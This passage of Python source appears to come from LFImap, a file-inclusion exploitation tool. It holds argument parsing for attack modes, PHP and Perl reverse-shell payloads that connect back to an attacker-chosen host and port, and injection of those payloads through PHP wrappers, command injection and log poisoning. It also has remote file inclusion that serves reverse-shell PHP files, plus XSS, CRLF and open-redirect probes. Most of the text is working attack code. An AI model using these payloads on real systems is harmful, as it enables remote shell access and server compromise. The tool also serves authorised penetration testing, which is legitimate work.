        "--trunc",
        action="store_true",
        dest="trunc",
        help='\t\t Attack using path traversal with wordlist (default "short.txt")',
    )
    attackGroup.add_argument(
        "-r",
        "--rfi",
        action="store_true",
        dest="rfi",
        help="\t\t Attack using remote file inclusion",
    )
    attackGroup.add_argument(
        "-c",
        "--cmd",
        action="store_true",
        dest="cmd",
        help="\t\t Attack using command injection",
    )
    attackGroup.add_argument(
        "-file",
        "--file",
        action="store_true",
        dest="file",
        help="\t\t Attack using file wrapper",
    )
    attackGroup.add_argument(
        "-heur",
        "--heuristics",
        action="store_true",
        dest="heuristics",
        help="\t\t Test for miscellaneous issues using heuristics",
    )
    attackGroup.add_argument(
        "-a",
        "--all",
        action="store_true",
        dest="test_all",
        help="\t\t Use all supported attack methods",
    )

    # enumGroup = parser.add_argument_group("ENUMERATION OPTIONS")
    # enumGroup.add_argument(
    #     "-eS",
    #     "--enum-system",
    #     action="store_true",
    #     dest="enum_system",
    #     help="\t\t Enumerate operating system",
    # )
    # enumGroup.add_argument(
    #     "-eF",
    #     "--enum-files",
    #     action="store_true",
    #     dest="enum_files",
    #     help="\t\t Enumerate file system",
    # )
    # enumGroup.add_argument(
    #     "-eU",
    #     "--enum-users",
    #     action="store_true",
    #     dest="enum_users",
    #     help="\t\t Enumerate existing users",
    # )
    # enumGroup.add_argument(
    #     "-eP",
    #     "--enum-proc",
    #     action="store_true",
    #     dest="enum_proc",
    #     help="\t\t Enumerate processes and programs",
    # )
    # enumGroup.add_argument(
    #     "-eN",
    #     "--enum-net",
    #     action="store_true",
    #     dest="enum_net",
    #     help="\t\t Enumerate network configuration",
    # )
    # enumGroup.add_argument(
    #     "-eA",
    #     "--enum-all",
    #     action="store_true",
    #     dest="enum_all",
    #     help="\t\t Utilize all enumeration options",
    # )

    payloadGroup = parser.add_argument_group("PAYLOAD OPTIONS")
    payloadGroup.add_argument(
        "-n",
        type=str,
        action="append",
        metavar="<U|B>",
        dest="encodings",
        help='\t\t Specify payload encoding(s). "U" for URL, "B" for base64',
    )
    payloadGroup.add_argument(
        "-q",
        "--quick",
        action="store_true",
        dest="quick",
        help="\t\t Perform quick testing with fewer payloads",
    )
    payloadGroup.add_argument(
        "-x",
        "--exploit",
        action="store_true",
        dest="revshell",
        help="\t\t Exploit and achieve reverse shell if RCE is available",
    )
    payloadGroup.add_argument(
        "--lhost",
        type=str,
        metavar="<lhost>",
        dest="lhost",
        help="\t\t Local ip address for reverse connection",
    )
    payloadGroup.add_argument(
        "--lport",
        type=int,
        metavar="<lport>",
        dest="lport",
        help="\t\t Local port number for reverse connection",
    )
    payloadGroup.add_argument(
        "--callback",
        type=str,
        metavar="<hostname>",
        dest="callback",
        help="\t\t Callback location for out of band detection",
    )
    # payloadGroup.add_argument(
    #     "--read-file",
    #     type=str,
    #     metavar="<file>",
    #     dest="readfile",
    #     help="\t\t File path to leak if LFR is available",
    # )
    # payloadGroup.add_argument(
    #     "--execute-cmd",
    #     type=str,
    #     metavar="<command>",
    #     dest="command",
    #     help="\t\t Command to execute if RCE is available",
    # )

    wordlistGroup = parser.add_argument_group("WORDLIST OPTIONS")
    wordlistGroup.add_argument(
        "-wT",
        type=str,
        metavar="<path>",
        dest="truncWordlist",
        help="\t\t Path to wordlist for path traversal modality",
    )
    wordlistGroup.add_argument(
        "--use-long",
        action="store_true",
        dest="uselong",
        help='\t\t Use "src/wordlists/long.txt" wordlist for path traversal modality',
    )

    outputOptions = parser.add_argument_group("OUTPUT OPTIONS")

    # outputOptions.add_argument(
    #     "-oH",
    #     type=str,
    #     metavar="<HTMLfile>",
    #     dest="htmlfile",
    #     help="\t\t Output findings to html file",
    # )
    #outputOptions.add_argument(
    #     "-oT",
    #     type=str,
    #     metavar="<txtfile>",
    #     dest="txtfile",
    #     help="\t\t Output findings to txt file",
    #)
    # outputOptions.add_argument(
    #     "-oX",
    #     type=str,
    #     metavar="<XMLfile>",
    #     dest="xmlfile",
    #     help="\t\t Output findings to xml file",
    # )
    # outputOptions.add_argument(
    #     "-oA",
    #     type=str,
    #     metavar="<ALLfiles>",
    #     dest="allfile",
    #     help="\t\t Output to all supported formats",
    # )

    outputOptions.add_argument(
        "--log",
        type=str,
        metavar="<file>",
        dest="log",
        help="\t\t Output all requests and responses to specified file",
    )

    otherGroup = parser.add_argument_group("OTHER")
    otherGroup.add_argument(
        "-nc",
        "--no-color",
        action="store_true",
        dest="no_colors",
        help="\t\t Disables colored output for STDOUT\n",
    )
    otherGroup.add_argument(
        "-v",
        "--verbose",
        action="store_true",    
        dest="verbose",
        help="\t\t Print more detailed output when performing attacks\n",
    )
    otherGroup.add_argument(
        "-h",
        "--help",
        action="help",
        default=argparse.SUPPRESS,
        help="\t\t Print this help message\n\n",
    )

    args = vars(parser.parse_args())

    return args


"""PHP"""
from src.httpreqs import request
from src.configs import config
from src.utils.encodings import encode
from src.utils.arguments import init_args
from src.attacks.logPoison import exploit_log_poison
from src.utils.info import printInfo
from src.utils.colors import Colors


def exploit_php(exploit, method, ip, port):
    """Exploit PHP"""
    args  = init_args()
    url = exploit["GETVAL"]
    post = exploit["POSTVAL"]

    phpTest = "which%20php"
    phpPayload = f'php+-r+\'$sock%3dfsockopen("{ip}",{port})%3bexec("/bin/sh+-i+<%263+>%263+2>%263")%3b\''

    print(
        Colors().purple("[?]") + " Checking if php is available on the target system...", flush = True
    )

    if method == "INPUT":
        u = url.replace(config.tempArg, encode(phpTest))
        res, _ = request.REQUEST(
            u, args['httpheaders'], exploit["POSTVAL"], config.proxies, "", ""
        )
        if "/bin" in res.text and "/php" in res.text:
            printInfo(ip, port, "PHP", "input wrapper")
            request.REQUEST(
                url.replace(config.tempArg, encode(phpPayload)),
                args['httpheaders'],
                exploit["POSTVAL"],
                config.proxies,
                "",
                "",
            )

    if method == "DATA":
        if args['mode'] == "post":
            res, _ = request.REQUEST(
                url.replace(config.tempArg, encode(phpTest)),
                args['httpheaders'],
                post,
                config.proxies,
                "",
                "",
            )
        else:
            res, _ = request.REQUEST(
                url.replace(config.tempArg, encode(phpTest)),
                args['httpheaders'],
                "",
                config.proxies,
                "",
                "",
            )
        if "/bin" in res.text and "/php" in res.text:
            printInfo(ip, port, "PHP", "data wrapper")
            if args['mode'] == "post":
                request.REQUEST(
                    url.replace(config.tempArg, encode(phpPayload)),
                    args['httpheaders'],
                    post,
                    config.proxies,
                    "",
                    "",
                )
            else:
                request.REQUEST(
                    url.replace(config.tempArg, encode(phpPayload)),
                    args['httpheaders'],
                    "",
                    config.proxies,
                    "",
                    "",
                )

    if method == "EXPECT":
        if args['mode'] == "post":
            res, _ = request.REQUEST(
                url,
                args['httpheaders'],
                post.replace(config.tempArg, encode(phpTest)),
                config.proxies,
                "",
                "",
            )
        else:
            res, _ = request.REQUEST(
                url.replace(config.tempArg, encode(phpTest)),
                args['httpheaders'],
                "",
                config.proxies,
                "",
                "",
            )
        if "/bin" in res.text and "/php" in res.text:
            printInfo(ip, port, "PHP", "expect wrapper")
            if args['mode'] == "post":
                request.REQUEST(
                    url,
                    args['httpheaders'],
                    post.replace(config.tempArg, encode(phpPayload)),
                    config.proxies,
                    "",
                    "",
                )
            else:
                request.REQUEST(
                    url.replace(config.tempArg, encode(phpPayload)),
                    args['httpheaders'],
                    "",
                    config.proxies,
                    "",
                    "",
                )

    if method == "TRUNC":
        exploit_log_poison(
            ip, port, url, phpPayload, "", encode(phpTest), "/php", exploit["POSTVAL"]
        )

    if method == "CMD":
        if args['mode'] == "post":
            res, _ = request.REQUEST(
                url,
                args['httpheaders'],
                post.replace(config.tempArg, encode(phpTest)),
                config.proxies,
                "",
                "",
            )
        else:
            res, _ = request.REQUEST(
                url.replace(config.tempArg, encode(phpTest)),
                args['httpheaders'],
                "",
                config.proxies,
                "",
                "",
            )
        if "/bin" in res.text and "/php" in res.text:
            printInfo(ip, port, "php", "command injection")
            if args['mode'] == "post":
                request.REQUEST(
                    url,
                    args['httpheaders'],
                    post.replace(config.tempArg, encode(phpPayload)),
                    config.proxies,
                    "",
                    "",
                )
            else:
                request.REQUEST(
                    url.replace(config.tempArg, encode(phpPayload)),
                    args['httpheaders'],
                    "",
                    config.proxies,
                    "",
                    "",
                )



"""Perl"""
from src.httpreqs import request
from src.configs import config
from src.utils.encodings import encode
from src.utils.arguments import init_args
from src.attacks.logPoison import exploit_log_poison
from src.utils.info import printInfo
from src.utils.colors import Colors


def exploit_perl(exploit, method, ip, port):
    """Exploit perl"""
    args  = init_args()
    url = exploit["GETVAL"]
    post = exploit["POSTVAL"]

    perlTest = "which%20perl"
    perlPayload = (
        f"perl+-e+'use+Socket%3b$i%3d\"{ip}\"%3b$p%3d{port}%3bsocket(S,PF_INET,SOCK_STREAM,getprotobyname"
        '("tcp"))%3bif(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">%26S")%3bopen(STDOUT,">%26S")%3bopen'
        '(STDERR,">%26S")%3bexec("/bin/sh+-i")%3b}%3b\''
    )

    print(
        Colors().purple("[?]") + " Checking if perl is available on the target system...", flush = True
    )

    if method == "INPUT":
        res, _ = request.REQUEST(
            url.replace(config.tempArg, encode(perlTest)),
            args['httpheaders'],
            exploit["POSTVAL"],
            config.proxies,
            "",
            "",
        )

        if "/bin" in res.text and "/perl" in res.text:
            u = url.replace(config.tempArg, encode(perlPayload))
            printInfo(ip, port, "perl", "input wrapper")
            request.REQUEST(
                u, args['httpheaders'], exploit["POSTVAL"], config.proxies, "", ""
            )

    if method == "DATA":
        if args['postreq']:
            res, _ = request.REQUEST(
                url.replace(config.tempArg, encode(perlTest)),
                args['httpheaders'],
                post,
                config.proxies,
                "",
                "",
            )
        else:
            res, _ = request.REQUEST(
                url.replace(config.tempArg, encode(perlTest)),
                args['httpheaders'],
                "",
                config.proxies,
                "",
                "",
            )

        if "/bin" in res.text and "/perl" in res.text:
            printInfo(ip, port, "perl", "data wrapper")
            if args['postreq']:
                request.REQUEST(
                    url.replace(config.tempArg, encode(perlPayload)),
                    args['httpheaders'],
                    post,
                    config.proxies,
                    "",
                    "",
                )
            else:
                request.REQUEST(
                    url.replace(config.tempArg, encode(perlPayload)),
                    args['httpheaders'],
                    "",
                    config.proxies,
                    "",
                    "",
                )

    if method == "EXPECT":
        if args['postreq']:
            res, _ = request.REQUEST(
                url,
                args['httpheaders'],
                post.replace(config.tempArg, encode(perlPayload)),
                config.proxies,
                "",
                "",
            )
        else:
            res, _ = request.REQUEST(
                url.replace(config.tempArg, encode(perlTest)),
                args['httpheaders'],
                "",
                config.proxies,
                "",
                "",
            )

        if "/bin" in res.text and "/perl" in res.text:
            printInfo(ip, port, "perl", "expect wrapper")
            if args['postreq']:
                request.REQUEST(
                    url,
                    args['httpheaders'],
                    post.replace(config.tempArg, encode(perlPayload)),
                    config.proxies,
                    "",
                    "",
                )
            else:
                request.REQUEST(
                    url.replace(config.tempArg, encode(perlPayload)),
                    args['httpheaders'],
                    "",
                    config.proxies,
                    "",
                    "",
                )

    if method == "TRUNC":
        exploit_log_poison(
            ip,
            port,
            url,
            encode(perlPayload),
            "",
            encode(perlTest),
            "/perl",
            exploit["POSTVAL"],
        )

    if method == "CMD":
        if args['postreq']:
            res, _ = request.REQUEST(
                url,
                args['httpheaders'],
                post.replace(config.tempArg, encode(perlTest)),
                config.proxies,
                "",
                "",
            )
        else:
            res, _ = request.REQUEST(
                url.replace(config.tempArg, encode(perlTest)),
                args['httpheaders'],
                "",
                config.proxies,
                "",
                "",
            )
        if "/bin" in res.text and "/perl" in res.text:
            printInfo(ip, port, "perl", "command injection")
            if args['postreq']:
                request.REQUEST(
                    url,
                    args['httpheaders'],
                    post.replace(config.tempArg, encode(perlPayload)),
                    config.proxies,
                    "",
                    "",
                )
            else:
                request.REQUEST(
                    url.replace(config.tempArg, encode(perlPayload)),
                    args['httpheaders'],
                    "",
                    config.proxies,
                    "",
                    "",
                )



"""Heuristics Tests"""
import re
import random
import string

import urllib.parse as urlparse
from src.utils.arguments import init_args
from src.configs.config import proxies
from src.httpreqs.request import prepareRequest
from src.httpreqs.request import REQUEST
from src.utils.stats import stats
from src.utils.colors import Colors


def test_heuristics(url, post):
    """Test Heuristics"""
    args  = init_args()
    br = False

    if args['verbose']:
        print("\n" + Colors().blue("[i]") + " Testing misc issues using heuristics...", flush = True)

    tests = []

    alphanumeric_chars = string.ascii_letters + string.digits

    rProtocol = "".join(random.choice(alphanumeric_chars.lower()) for _ in range(3))
    rNumb1 = str(random.randint(1, 100))
    rLetter1 = random.choice(alphanumeric_chars.lower())
    rLetter2 = random.choice(alphanumeric_chars.lower())
    rLetter3 = "".join(random.choice(string.ascii_letters.lower()) for _ in range(2))
    rNumb2 = str(random.randint(1, 100))
    rLetter4 = "".join(random.choice(string.ascii_letters.lower()) for _ in range(2))

    # Custom XSS polyglot
    xssTest = (
        rProtocol
        + "%3A"
        + rNumb1
        + rLetter1
        + "%3E"
        + rLetter2
        + "%3C"
        + rLetter3
        + "%3B"
        + rNumb2
        + "%22%27"
        + rLetter4
    )
    tests.append(xssTest)

    # Custom CRLF polyglot
    tests.append(
        "%0d%0aLfi:13CRLF37%250d%250aLfi%3A13CRLF37%25%30D%25%30ALfi%3A13CRLF37"
    )

    # TODO store these in a separate file and make it bigger
    fiErrors = [
        "warning",
        "include(",
        "require(",
        "fopen(",
        "fpassthru(",
        "readfile(",
        "fread(",
        "fgets(",
    ]
    sqlErrors = [
        "you have an error in your sql syntax",
        "unclosed qutation mark after the character string",
        "you have an error in your sql syntax",
        "mysql_query(",
        "mysql_fetch_array(",
        "mysql_fetch_assoc(",
        "mysql_fetch_field(",
        "mysql_fetch_field_direct(",
        "mysql_fetch_lengths(",
        "mysql_fetch_object(",
        "mysql_fetch_row(",
        "mysql_fetch_all(",
        "mysql_prepare(",
        "mysql_info(",
        "mysql_real_query(",
        "mysql_stmt_init(",
        "mysql_stmt_execute(",
    ]

    for test in tests:
        if args['verbose'] and xssTest in test:
            print(Colors().blue("[i]") + " Testing for XSS...")
        if args['verbose'] and "%0d%0a" in test:
            print(Colors().blue("[i]") + " Testing for CRLF...")

        vuln = False
        u, tempHeaders, postTest = prepareRequest(args['param'], test, url, post)
        res, _ = REQUEST(u, tempHeaders, postTest, proxies, "INFO", "INFO")

        # HREF
        if res and rProtocol + ":" in res.text.lower():
            pattern = r'href="' + rProtocol + '\\:[^"]*'
            matches = re.findall(pattern, res.text.lower())
            if len(matches) > 0 and not vuln:
                print("    Positive regex match found in response: " + pattern, flush = True)
                vuln = True
                if args['postreq'] and len(args['postreq']) > 1:
                    print(
                        Colors().green("[+]")
                        + " XSS -> '"
                        + u
                        + "' -> HTTP POST -> '"
                        + postTest
                        + "' -> reflection in HREF attribute value",
                        flush = True
                    )
                else:
                    print(
                        Colors().green("[+]")
                        + " XSS -> '"
                        + u
                        + "' -> reflection in HREF atribute value",
                        flush = True
                    )

        if (
            res
            and rProtocol
            + ":"
            + rNumb1
            + rLetter1
            + ">"
            + rLetter2
            + "<"
            + rLetter3
            + ";"
            + rNumb2
            + "\"'"
            + rLetter4
            in res.text.lower()
        ):
            vuln = True
            if args['postreq'] and len(args['postreq']) > 1:
                print(
                    Colors().green("[+]")
                    + " XSS -> '"
                    + u
                    + "' -> HTTP POST -> '"
                    + postTest
                    + "' -> full reflection in response",
                    flush = True
                )
            else:
                print(
                    Colors().green("[+]")
                    + " XSS -> '"
                    + u
                    + "' -> full reflection in response",
                    flush = True
                )

        else:
            # HREF
            if res and rProtocol + ":" in res.text.lower():
                pattern = r'href="' + rProtocol + '\\:[^"]*'
                matches = re.findall(pattern, res.text.lower())
                if len(matches) > 0 and not vuln:
                    print("    Positive regex match found in response: " + pattern, flush = True)
                    vuln = True
                    if args['postreq'] and len(args['postreq']) > 1:
                        print(
                            Colors().green("[+]")
                            + " XSS -> '"
                            + u
                            + "' -> HTTP POST -> '"
                            + postTest
                            + "' -> reflection in HREF attribute value. Check if javascript: is allowed",
                            flush = True
                        )
                    else:
                        print(
                            Colors().green("[+]")
                            + " XSS -> '"
                            + u
                            + "' -> reflection in HREF atribute value. Check if javascript: is allowed",
                            flush = True
                        )

            # ATTRIBUTE
            if res and rNumb2 + "\"'" + rLetter4 in res.text.lower():
                pattern = (
                    r'<[^>]+?\s*=\s*["\'][^"\']*?\b.*'
                    + rNumb2
                    + "\"'"
                    + rLetter4
                    + "\\b[^\"']*?[\"'][^>]*>"
                )
                matches = re.findall(pattern, res.text.lower())
                if len(matches) > 0 and not vuln:
                    print("    Positive regex match found in response: " + pattern, flush = True)
                    vuln = True
                    if args['postreq'] and len(args['postreq']) > 1:
                        print(
                            Colors().green("[+]")
                            + " XSS -> '"
                            + u
                            + "' -> HTTP POST -> '"
                            + postTest
                            + "' -> reflection in tag attribute",
                            flush = True
                        )
                    else:
                        print(
                            Colors().green("[+]")
                            + " XSS -> '"
                            + u
                            + "' -> reflection in tag atribute",
                            flush = True
                        )

            # SCRIPT
            if res and rLetter3 + ";" + rNumb2 in res.text.lower():
                pattern = (
                    r"" + rLetter3 + ";" + rNumb2 + '["\'"][\\s\\S]*\\<\\/script\\>'
                )

                matches = re.findall(pattern, res.text.lower())
                if len(matches) > 0 and not vuln:
                    print("    Positive regex match found in response: " + pattern, flush = True)
                    vuln = True
                    if args['postreq'] and len(args['postreq']) > 1:
                        print(
                            Colors().green("[+]")
                            + " XSS -> '"
                            + u
                            + "' -> HTTP POST -> '"
                            + postTest
                            + "' -> reflection in script context",
                            flush = True
                        )
                    else:
                        print(
                            Colors().green("[+]")
                            + " XSS -> '"
                            + u
                            + "' -> reflection in script context",
                            flush = True
                        )

        # CRLF
        if (
            res
            and any("13CRLF37" in value for value in res.headers.values())
            and any("Lfi" in key for key in res.headers)
        ):
            vuln = True
            if args['postreq'] and len(args['postreq']) > 1:
                print(
                    Colors().green("[+]")
                    + " CRLF -> '"
                    + u
                    + "' -> HTTP POST -> '"
                    + postTest
                    + "' -> response splitting, 'lfi' header is present",
                    flush = True
                )
            else:
                print(
                    Colors().green("[+]")
                    + " CRLF -> '"
                    + u
                    + "' -> response splitting, 'Lfi' header is present",
                    flush = True
                )

        if vuln:
            stats["vulns"] += 1
            br = True

            # Print CT, CSP details, because these could present another layer of security against XSS, CRLF
            if "Content-Type" in res.headers:
                print("    Content-Type: " + res.headers["Content-Type"], flush = True)
            if "Content-Security-Policy" in res.headers:
                print(
                    "    Content-Security-Policy: "
                    + res.headers["Content-Security-Policy"],
                    flush = True
                )

        if args['quick'] or br:
            break

    if args['verbose']:
        print(Colors().blue("[i]") + " Testing for error-based info leak...", flush = True)

    if res and fiErrors[0] in res.text.lower():
        for i in range(1, len(fiErrors)):
            if fiErrors[i] in res.text.lower():
                if args['postreq'] and len(args['postreq']) > 1:
                    print(
                        Colors().green("[+]")
                        + " Info disclosure -> '"
                        + fiErrors[i]
                        + "' error triggered -> '"
                        + u
                        + "' -> HTTP POST -> '"
                        + postTest
                        + "'",
                        flush = True
                    )
                else:
                    print(
                        Colors().green("[+]")
                        + " Info disclosure -> '"
                        + fiErrors[i]
                        + "' error triggered -> '"
                        + u
                        + "'",
                        flush = True
                    )
                stats["vulns"] += 1

        # Check for Sql errors
        for i, sql_error in enumerate(sqlErrors):
            if res and sql_error in res.text.lower():
                if len(args['postreq']) > 1:
                    print(
                        Colors().green("[+]")
                        + " Info disclosure -> '"
                        + sql_error
                        + "' error detected -> '"
                        + u
                        + "' -> HTTP POST -> '"
                        + postTest
                        + "'",
                        flush = True
                    )
                else:
                    print(
                        Colors().green("[+]")
                        + " Info disclosure -> '"
                        + sql_error
                        + "' error detected -> '"
                        + u
                        + "'",
                        flush = True
                    )
                stats["vulns"] += 1

    # Open redirect check
    if args['verbose']:
        print(Colors().blue("[i]") + " Testing for open redirect...", flush = True)

    u, tempHeaders, postTest = prepareRequest(args['param'], "/lfi/a/../", url, post)
    # followRedirect must be False, otherwise if CSRF token refresh needs to happen, it might not be able to refresh the token and break
    res, _ = REQUEST(u, tempHeaders, postTest, proxies, "INFO", "INFO", exploit=False)

    if res and "Location" in res.headers:
        loc = res.headers.get("Location")
    else:
        loc = None

    if res and loc is not None and "/lfi/" in loc:
        # Full reflection + after the http|s protocol cases
        if (
            loc == "/lfi/a/../"
            or loc == "http:///lfi/a/../"
            or loc == "https:///lfi/a/../"
        ):
            if args['postreq'] and len(args['postreq']) > 1:
                print(
                    Colors().green("[+]")
                    + " Open redirect -> '"
                    + u
                    + "' -> HTTP POST -> '"
                    + postTest.replace("/lfi/a/../", "evil.com")
                    + "'",
                    flush = True
                )
            else:
                print(
                    Colors().green("[+]")
                    + " Open redirect -> '"
                    + u.replace("/lfi/a/../", "evil.com")
                    + "'",
                    flush = True
                )
            stats["vulns"] += 1
            br = True

        # Reflection after the relative path
        elif loc == "//lfi/a/../" or loc == "///lfi/a../":
            if args['postreq'] and len(args['postreq']) > 1:
                print(
                    Colors().green("[+]")
                    + " Open redirect via relative double slash -> '"
                    + u
                    + "' -> HTTP POST -> '"
                    + postTest.replace("/lfi/a/../", "/evil.com/")
                    + "'",
                    flush = True
                )
            else:
                print(
                    Colors().green("[+]")
                    + " Open redirect via relative double slash -> '"
                    + u.replace("/lfi/a/../", "/evil.com/")
                    + "'",
                    flush = True
                )
            stats["vulns"] += 1
            br = True

        elif "/a/../" in loc and "/a/../" in urlparse.urlparse(loc).path:
            if args['postreq'] and len(args['postreq']) > 1:
                print(
                    Colors().green("[+]")
                    + " Client-Side path traversal redirect -> '"
                    + u
                    + "' -> HTTP POST -> '"
                    + postTest.replace("/lfi/a/../", "/../arbitrary/endpoint")
                    + "'",
                    flush = True
                )
            else:
                print(
                    Colors().green("[+]")
                    + " Client-Side path traversal redirect -> '"
                    + u.replace("/lfi/a/../", "/../arbitrary/endpoint")
                    + "'",
                    flush = True
                )
            stats["vulns"] += 1
            br = True
    return



"""RFI"""
import os
import threading
import fileinput
import urllib
from random import randint

from src.httpreqs import request
from src.configs.config import rfi_test_port
from src.utils.arguments import init_args
from src.servers.HTTPServer import serve_forever
from src.configs import config
from src.utils.colors import Colors
from src.utils.info import printInfo


def random_with_N_digits(n):
    """
    Random number to the n'th power generator
    
    Returns int
    """
    range_start = 10 ** (n - 1)
    range_end = (10**n) - 1
    return randint(range_start, range_end)


def test_rfi(url, post):
    """Test RFI"""
    args  = init_args()
    if args['verbose']:
        print(Colors().blue("[i]") + " Testing remote file inclusion...", flush = True)

    # Localhost RFI test
    if args['lhost']:
        try:
            # Setup exploit serving path
            if os.access(args['scriptDirectory'] + os.sep + "src/exploits", os.R_OK):
                config.webDir = args['scriptDirectory'] + os.sep + "src/exploits"
            else:
                print(
                    Colors().red("[-]")
                    + "Directory '"
                    + args['scriptDirectory']
                    + "/src/exploits' can't be accessed. Cannot setup local web server for RFI test.",
                    flush = True
                )
                return

            threading.Thread(target=serve_forever).start()
            rfiTest = []

            rfiTest.append(
                f"http%3A%2F%2F{args['lhost']}%3A{rfi_test_port}%2Fysvznc"
            )
            rfiTest.append(
                f"http%3A%2F%2F{args['lhost']}%3A{rfi_test_port}%2Fysvznc%00"
            )
            rfiTest.append(
                f"http%3A%2F%2F{args['lhost']}%3A{rfi_test_port}%2Fysvznc.gif"
            )
            rfiTest.append(
                f"http%3A%2F%2F{args['lhost']}%3A{rfi_test_port}%2Fysvznc.png"
            )
            rfiTest.append(
                f"http%3A%2F%2F{args['lhost']}%3A{rfi_test_port}%2Fysvznc.jsp"
            )
            rfiTest.append(
                f"http%3A%2F%2F{args['lhost']}%3A{rfi_test_port}%2Fysvznc.html"
            )
            rfiTest.append(
                f"http%3A%2F%2F{args['lhost']}%3A{rfi_test_port}%2Fysvznc.php"
            )

            for test in rfiTest:
                u, reqHeaders, postTest = request.prepareRequest(
                    args['param'], test, url, post
                )
                _, br = request.REQUEST(
                    u, reqHeaders, postTest, config.proxies, "RFI", "RFI"
                )
                if not br:
                    return
                if args['quick']:
                    return
        except:
            raise

    # Internet RFI test
    if args['verbose']:
        print(Colors().blue("[i]") + " Trying to include internet-hosted file...", flush = True)

    base_uri = "https://raw.githubusercontent.com/hansmach1ne/LFImap/main/lfimap/src/exploits/"

    pylds = []

    for filename in ["ysvznc.php", "ysvznc.jsp", "ysvznc.html", "ysvznc.gif", "ysvznc.png"]:
        pylds.append(
            urllib.parse.quote_plus(f"{base_uri}{filename}")
        )

    if args['callback']:
        if not args['callback'].startswith("http://"):
            callbackTest = (
                "http://" + args['callback'] + "%2F" + str(random_with_N_digits(5))
            )
        pylds.append(callbackTest)

    for pyld in pylds:
        try:
            u, reqHeaders, postTest = request.prepareRequest(
                args['param'], pyld, url, post
            )
            _, br = request.REQUEST(
                u, reqHeaders, postTest, config.proxies, "RFI", "RFI"
            )
            if not br:
                return
            if args['quick']:
                return
        except:
            raise


def prepareRfiExploit(payloadFile, temporaryFile, ip, port):
    # Copy a file from exploits/reverse_shell.php
    if not os.path.exists(payloadFile):
        print(
            Colors().red("[-]")
            + " Cannot locate '"
            + payloadFile
            + "'. Skipping RFI exploit...",
            flush = True
        )
        return
    else:
        # Prepare file that will be included
        with open(payloadFile, "r", encoding="utf-8") as f:
            with open(temporaryFile, "w", encoding="utf-8") as r:
                lines = f.readlines()
                for line in lines:
                    line = line[:-1]
                    r.write(line + "\n")

    # Modify reverse_shell_temp.php ip and port number values
    with fileinput.FileInput(temporaryFile, inplace=True) as file:
        for line in file:
            # This redirects stdout to a file, replacing the ip and port values as needed
            print(line.replace("IP_ADDRESS", ip), flush = True)

    with fileinput.FileInput(temporaryFile, inplace=True) as file:
        for line in file:
            print(line.replace("PORT_NUMBER", str(port)), flush = True)


def exploit_rfi(exploit, method, ip, port):
    """Exploit RFI"""
    args  = init_args()
    if args['f']:
        return

    url = exploit["GETVAL"]
    printInfo(ip, port, "php", "Remote File Inclusion")
    if args['mode'] == "post":
        if exploit["OS"] == "linux":
            prepareRfiExploit(
                config.webDir + os.path.sep + "/reverse_shell_lin.php",
                config.webDir + os.path.sep + "reverse_shell_lin_tmp.php",
                ip,
                port,
            )
            request.REQUEST(
                url,
                args['httpheaders'],
                exploit["POSTVAL"].replace(config.tempArg, "reverse_shell_lin_tmp.php"),
                config.proxies,
                "",
                "",
            )
        else:
            prepareRfiExploit(
                config.webDir + os.path.sep + "/reverse_shell_win.php",
                config.webDir + os.path.sep + "reverse_shell_win_tmp.php",
                ip,
                port,
            )
            request.REQUEST(
                url,
                args['httpheaders'],
                exploit["POSTVAL"].replace(config.tempArg, "reverse_shell_win_tmp.php"),
                config.proxies,
                "",
                "",
            )
        return

    # It is a GET
    if exploit["OS"] == "windows":
        prepareRfiExploit(
            config.webDir + os.path.sep + "/reverse_shell_win.php",
            config.webDir + os.path.sep + "reverse_shell_win_tmp.php",
            ip,
            port,
        )
        request.REQUEST(
            url.replace(config.tempArg, "reverse_shell_win_tmp.php"),
            args['httpheaders'],
            "",
            config.proxies,
            "",
            "",
        )
    else:
        prepareRfiExploit(
            config.webDir + os.path.sep + "/reverse_shell_lin.php",
            config.webDir + os.path.sep + "reverse_shell_lin_tmp.php",
            ip,
            port,
        )
        request.REQUEST(
            url.replace(config.tempArg, "reverse_shell_lin_tmp.php"),
            args['httpheaders'],
            "",
            config.proxies,
            "",
            "",
        )
    return



from urllib.parse import urlsplit, parse_qsl, parse_qs, urlparse
from src.utils.arguments import init_args
import json
import re
from src.configs import config

import itertools


def is_file_ending_with_newline(file_path):
    """
    Check if there is a new line after the headers in reqfile.
    Return boolean.
    """
    with open(file_path, "r", encoding="utf-8") as file:
        content = file.read()

    # Find the index of the first empty line, which indicates the end of headers
    index = content.find("\n\n")

    if index != -1 and index < len(content) - 1:
        return True

    return False


def is_valid_url(url):
    """
    Return if the provided `url` is valid.
    Returns boolean.
    """
    if not url:
        return False

    urlRegex = re.compile(
        r"^(?:http)s?://"  # http://, https://
        r"(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\.)*?[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9]?|"  # domain
        r"localhost|"  # localhost
        r"\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})"  # IP address
        r"(?::\d+)?"  # optional port
        r"(?:/?|[/?]\S*)$",  # optional trailing slash or path
        re.IGNORECASE,
    )

    return re.match(urlRegex, url) is not None


def is_valid_json(data):
    """
    Try to load the provided data (str) as json and return if it is or not successful
    Returns boolean.
    """
    try:
        json.loads(data)
        return True
    except json.JSONDecodeError:
        return False


def getDictKey(dictionary, n):
    """
    Return the n'th item's name from a list of keys() in a array form to a given dict
    Return n'th item name from a dict
    """
    keys = list(dictionary.keys())
    return keys[n]


def getDictValue(dictionary, n):
    """
    Return the n'th item's value from a list of keys() in a array form to a given dict
    Return n'th item value from a dict
    """
    values = list(dictionary.values())
    return values[n]


def convert_http_formdata_to_json(formdata):
    """
    Convert a HTTP FormData into JSON form
    Returns JSON in `str` form
    """
    items = formdata.split("&")
    parsed_data = {}
    for item in items:
        key_value = item.split("=")
        key = key_value[0]
        value = key_value[1] if len(key_value) > 1 else ""
        parsed_data[key] = value
    json_data = json.dumps(parsed_data)
    return json_data


def parse_http_request_file(file_path):
    """
    Open a provided HTTP Request file and parse it
    Returns None if unsuccessful
    Returns `method, headers_dict, form_data` 
    """
    try:
        with open(file_path, "r", encoding="utf-8") as file:
            http_request = file.read()
            headers, post_data = http_request.split(
                "\n\n", 1
            )  # Split into headers and POST data
            header_lines = headers.split("\n")
            method, endpoint, protocol = header_lines[0].split(" ", 2)

            # Parse headers
            headers_dict = {}
            for line in header_lines[1:]:
                header_name, header_value = line.split(":", 1)
                headers_dict[header_name.strip()] = header_value.strip()

            config.postreq = post_data.strip()
            form_data = parseFormDataLine(post_data.strip())

            return method, headers_dict, form_data

    except Exception as e:
